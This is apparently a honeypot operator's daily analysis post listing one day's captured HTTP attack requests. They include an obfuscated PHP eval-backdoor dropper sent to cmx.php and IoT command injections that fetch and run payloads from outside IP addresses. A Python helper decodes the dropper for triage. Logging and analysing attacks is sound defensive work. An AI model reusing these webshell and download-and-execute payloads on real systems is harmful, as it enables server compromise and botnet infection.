S-Owl

S(ecurity)Owl

WOWHoneypot Quick Analysis (Day 57)

This is a quick analysis of WOWHoneypot for 2018/07/30 (Mon), day 57 of operation.
Today's total access count is 56. Today's count is low.
The full access log follows.

31 2018-07-30 GET /
3 2018-07-30 POST /images.php
3 2018-07-30 POST /cmx.php
3 2018-07-30 GET /cmx.php?cmd=echo+%5E%3C%3Fphp+%24func%3D%27c%27.%27r%27.%27e%27.%27a%27.%27t%27.%27e%27.%27_%27.%27f%27.%27u%27.%27n%27.%27c%27.%27t%27.%27i%27.%27o%27.%27n%27%3B%24test%3D%24func%28%27%24x%27%2C%27e%27.%27v%27.%27a%27.%27l%27.%27%28b%27.%27a%27.%27s%27.%27e%27.%276%27.%274%27.%27_%27.%27d%27.%27e%27.%27c%27.%27o%27.%27d%27.%27e%28%24x%29%29%3B%27%29%3B%24test%28%27c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9%27%29%3B+%3F%5E%3E+%3Eimages.php+%26+echo+Hello%2C+Peppa%21
2 2018-07-30 GET /pma/scripts/setup.php
2 2018-07-30 GET /phpMyAdmin/scripts/setup.php
2 2018-07-30 GET /myadmin/scripts/setup.php
2 2018-07-30 GET /cmx.php?cmd=echo+%22%3C%3Fphp+%5C%24func%3D%27c%27.%27r%27.%27e%27.%27a%27.%27t%27.%27e%27.%27_%27.%27f%27.%27u%27.%27n%27.%27c%27.%27t%27.%27i%27.%27o%27.%27n%27%3B%5C%24test%3D%5C%24func%28%27%5C%24x%27%2C%27e%27.%27v%27.%27a%27.%27l%27.%27%28b%27.%27a%27.%27s%27.%27e%27.%276%27.%274%27.%27_%27.%27d%27.%27e%27.%27c%27.%27o%27.%27d%27.%27e%28%5C%24x%29%29%3B%27%29%3B%5C%24test%28%27c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9%27%29%3B+%3F%3E%22+%3Eimages.php+%26+echo+Hello%2C+Peppa%21
1 2018-07-30 HEAD /robots.txt
1 2018-07-30 GET /?XDEBUG_SESSION_START=phpstorm
1 2018-07-30 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-07-30 GET /shell?cd+/tmp;cd+/var;wget+hxxp://199.195.254[.]118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo
1 2018-07-30 GET /phpmyadmin/scripts/setup.php
1 2018-07-30 GET /MyAdmin/scripts/setup.php
1 2018-07-30 GET /cmx.php?cmd=uname+-a
1 2018-07-30 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20

Access counts after excluding the phpMyAdmin-related requests (8), the POSTs to php (6), and the accesses to /.

3 2018-07-30 GET /cmx.php?cmd=echo+%5E%3C%3Fphp+%24func%3D%27c%27.%27r%27.%27e%27.%27a%27.%27t%27.%27e%27.%27_%27.%27f%27.%27u%27.%27n%27.%27c%27.%27t%27.%27i%27.%27o%27.%27n%27%3B%24test%3D%24func%28%27%24x%27%2C%27e%27.%27v%27.%27a%27.%27l%27.%27%28b%27.%27a%27.%27s%27.%27e%27.%276%27.%274%27.%27_%27.%27d%27.%27e%27.%27c%27.%27o%27.%27d%27.%27e%28%24x%29%29%3B%27%29%3B%24test%28%27c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9%27%29%3B+%3F%5E%3E+%3Eimages.php+%26+echo+Hello%2C+Peppa%21
2 2018-07-30 GET /cmx.php?cmd=echo+%22%3C%3Fphp+%5C%24func%3D%27c%27.%27r%27.%27e%27.%27a%27.%27t%27.%27e%27.%27_%27.%27f%27.%27u%27.%27n%27.%27c%27.%27t%27.%27i%27.%27o%27.%27n%27%3B%5C%24test%3D%5C%24func%28%27%5C%24x%27%2C%27e%27.%27v%27.%27a%27.%27l%27.%27%28b%27.%27a%27.%27s%27.%27e%27.%276%27.%274%27.%27_%27.%27d%27.%27e%27.%27c%27.%27o%27.%27d%27.%27e%28%5C%24x%29%29%3B%27%29%3B%5C%24test%28%27c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9%27%29%3B+%3F%3E%22+%3Eimages.php+%26+echo+Hello%2C+Peppa%21
1 2018-07-30 HEAD /robots.txt
1 2018-07-30 GET /?XDEBUG_SESSION_START=phpstorm
1 2018-07-30 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-07-30 GET /shell?cd+/tmp;cd+/var;wget+hxxp://199.195.254[.]118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo
1 2018-07-30 GET /cmx.php?cmd=uname+-a
1 2018-07-30 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20 

What appeared for the first time today is the following.

GET /cmx.php?cmd= ... ... Hello, Peppa!

The body of the POST requests to the same path and the GET query were identical.
Because the trailing greeting is the same, this appears to be an attack by the same actor that has been POSTing to php up to now.
The 9 source IPs were almost all different.
Since a name makes identification easier, let's call this actor "Peppa" from now on.
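As an added example (not code from the original post), here is a small Python triage helper for the cmx.php requests above: it URL-decodes the cmd= parameter, undoes the 'c'.'r'.'e' string-concatenation obfuscation, extracts the file the echo output is redirected into, base64-decodes the argument handed to the dynamically created function, and lists which PHP functions the dropped code relies on. The two sample lines are copied from the log above; they differ only in shell quoting (cmd.exe-style ^ escapes versus a POSIX-shell "..." string with \$), and the helper handles both.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Constructed samples: the two cmx.php summary lines from this day's log above.
SAMPLE_LINES = [
    "3 2018-07-30 GET /cmx.php?cmd=echo+%5E%3C%3Fphp+%24func%3D%27c%27.%27r%27.%27e%27.%27a%27.%27t%27.%27e%27.%27_%27.%27f%27.%27u%27.%27n%27.%27c%27.%27t%27.%27i%27.%27o%27.%27n%27%3B%24test%3D%24func%28%27%24x%27%2C%27e%27.%27v%27.%27a%27.%27l%27.%27%28b%27.%27a%27.%27s%27.%27e%27.%276%27.%274%27.%27_%27.%27d%27.%27e%27.%27c%27.%27o%27.%27d%27.%27e%28%24x%29%29%3B%27%29%3B%24test%28%27c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9%27%29%3B+%3F%5E%3E+%3Eimages.php+%26+echo+Hello%2C+Peppa%21",
    "2 2018-07-30 GET /cmx.php?cmd=echo+%22%3C%3Fphp+%5C%24func%3D%27c%27.%27r%27.%27e%27.%27a%27.%27t%27.%27e%27.%27_%27.%27f%27.%27u%27.%27n%27.%27c%27.%27t%27.%27i%27.%27o%27.%27n%27%3B%5C%24test%3D%5C%24func%28%27%5C%24x%27%2C%27e%27.%27v%27.%27a%27.%27l%27.%27%28b%27.%27a%27.%27s%27.%27e%27.%276%27.%274%27.%27_%27.%27d%27.%27e%27.%27c%27.%27o%27.%27d%27.%27e%28%5C%24x%29%29%3B%27%29%3B%5C%24test%28%27c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9%27%29%3B+%3F%3E%22+%3Eimages.php+%26+echo+Hello%2C+Peppa%21",
]


def triage_cmx_line(line: str) -> dict:
    """Decode one '<count> <date> <method> <path>' summary line into analyst-friendly fields."""
    count, date, method, target = line.split(" ", 3)
    url = urlsplit(target)
    cmd = parse_qs(url.query).get("cmd", [""])[0]  # parse_qs undoes %XX and '+'
    # Stage 1: the inline PHP that `echo` writes to disk. The 'c'.'r'.'e' joins hide the
    # function names, so strip the "'.'" separators and any shell-escaping backslashes.
    deobf = re.sub(r"'\.'", "", cmd).replace("\\$", "$")
    m = re.search(r"<\?php\s*(.*?)\s*\?\^?>", deobf)
    stage1 = m.group(1) if m else ""
    # Stage 2: the base64 argument passed to the created eval wrapper, $test('...').
    m = re.search(r"\$test\('([A-Za-z0-9+/=]+)'\)", stage1)
    b64 = m.group(1) if m else ""
    stage2 = base64.b64decode(b64 + "=" * (-len(b64) % 4)).decode("utf-8", "replace") if b64 else ""
    # Where the echoed PHP lands, and the trailing greeting the post uses to link requests.
    m = re.search(r">\s*([\w./-]+\.php)", cmd)
    dropped = m.group(1) if m else None
    m = re.search(r"&\s*echo\s+(.+?)\s*$", cmd)
    marker = m.group(1) if m else None
    wanted = ("create_function", "eval(", "base64_decode(", "session_start(", "$_POST[", "$_SESSION[")
    return {
        "count": int(count), "date": date, "method": method, "path": url.path,
        "dropped_file": dropped, "marker": marker,
        "stage1": stage1, "stage2": stage2,
        "php_functions": [w for w in wanted if w in stage1 or w in stage2],
    }


if __name__ == "__main__":
    for sample in SAMPLE_LINES:
        r = triage_cmx_line(sample)
        print(f"{r['count']}x {r['method']} {r['path']} -> writes {r['dropped_file']}, marker {r['marker']!r}")
        print("  relies on:", ", ".join(r["php_functions"]))
```

For both lines the decoded second stage is the same: a session-backed eval() loader gated on a hashed POST parameter, which is the artifact to look for on any real host that served these requests.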

Otherwise, there was scanning by ZmEu and Gemini and Hakai attacks against IoT devices.


Today's hunting log is below: two IoT-type entries.

1 2018-07-30 wget+hxxp://199.195.254[.]118/jaws
1 2018-07-30 wget hxxp://178.128.11[.]199/rvs 


That's all.